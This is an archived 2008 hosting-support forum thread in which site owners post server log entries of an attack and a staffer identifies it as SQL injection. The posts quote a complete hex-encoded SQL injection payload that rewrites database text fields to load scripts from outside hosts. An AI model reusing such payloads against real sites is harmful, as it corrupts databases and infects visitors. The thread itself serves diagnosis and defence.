TotalChoice Hosting Family Forums > Attacks On My Site/server

TotalChoice Hosting Family Forums > TotalChoice Hosting General Support > Security Discussions

carbonize

Aug 22 2008, 04:57 AM

I was going through my error logs and noticed some alerts so I downloaded my raw log. I found the following entries (there were more but I'll only post one full and one truncated). So I'm guessing there is an exploit in an old version of either PHP or Apache but can anyone shed any light on it? I have blocked the 2 main IPs using htaccess for now.

ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374
2
0612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73
2
06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78
7
47970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78
7
47970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D
2
0205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535441
5
455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
4
32B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31
3
03030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B4043
2
B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372
6
97074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A7322
3
E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4375
7
2736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C
4
C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
<snip>
C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

TCH-Dick

Aug 22 2008, 05:53 AM

This is a common form of an SQL injection and is not really related to apache or php. This can be accomplished on any scripting language if the script is not validating user input. This particular attack is attempting to insert code that allows an external script to load in a frame on the site, which is then used for things like redirecting the visitor or infecting their machine.

If you convert everything in parenthesis for CAST from hex to ascii, you can see the sql query used. This will give you some idea of what they were attempting and if it affected your database.

We will take this information and add the appropriate rules to our servers to help prevent these attacks.

carbonize

Aug 22 2008, 06:24 AM

Your servers blocked the attack anyway because the GET was to long. This is how I discovered them because they were in the error log.

atmospheresinking

Oct 7 2008, 08:03 PM

I'm getting these as well.

;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563742
0612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732
06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787
47970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E787
47970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2
0205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415
455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B404
32B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E737
33131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B4
0432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736
372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E6
8746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C6
55F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204
445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);"]http://atmospheresinking.com/?;DECLARE%20@...000));EXEC(@S);[/url]

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.